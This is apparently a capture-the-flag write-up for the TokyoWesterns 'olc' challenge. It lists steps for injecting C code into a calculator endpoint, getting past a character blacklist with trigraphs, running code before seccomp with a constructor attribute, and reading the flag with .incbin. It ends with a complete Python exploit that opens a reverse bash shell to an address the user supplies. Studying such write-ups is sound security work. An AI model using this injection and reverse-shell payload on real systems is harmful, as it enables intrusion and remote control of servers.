- Realized that we can write C code after a
;character. - We circumvented the character blacklist via trigraphs (
<%instead of{et al). - Tried various syscalls, some of them worked, some did not.
- Leaked files and directory structure one byte at a time.
- We tried to create reverse shell but seccomp prevented us from doing so.
- Used
__attribute__((constructor(101))to execute our code before the already existing constructor that set up seccomp. - Now the shell worked!
- Realized that we had no permission to read the flag file because the code run with nobody:nogroup permissions.
- Used
asm(".incbin")to read flag file compile time. (The compile was running as www-data user which could read it)
Example payload to read "flag" and start a reverse shell:
#!/usr/bin/env python3
import requests, sys, traceback, time, sys
from multiprocessing.pool import ThreadPool as Pool
# Modify addr in the C code below to include your IP address and port
r = requests.get('http://olc.chal.ctf.westerns.tokyo/calc.php', params={'formula': f'''5;
return 5;
}}
__attribute__((constructor(101))) void func() {{
extern char incbin_x_start[1];
setreuid(0,0);
setregid(0,0);
setresuid(0,0,0);
int fd = socket(2, 1, 0);
unsigned char addr[] = {{0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00}};
connect(fd, addr, 16);
dup2(fd, 0);
dup2(fd, 1);
dup2(fd, 2);
printf("hihi %p\n", incbin_x_start);
fflush(stdout);
puts(incbin_x_start);
char *args[] = {{"/bin/bash", "-i", NULL}};
execve("/bin/bash", args, 0);
return 5;
}}
__asm__(".data\\nincbin_x_start: .incbin \\"/srv/olc/public/calc.php\\"\\n.byte 0\\n.text\\n");
static void dummy() {{
int res = 5;
'''.replace('\n', ' ').replace('{', '<%').replace('}', '%>').replace('#', '%:').strip()})
print(r.text)
r.raise_for_status()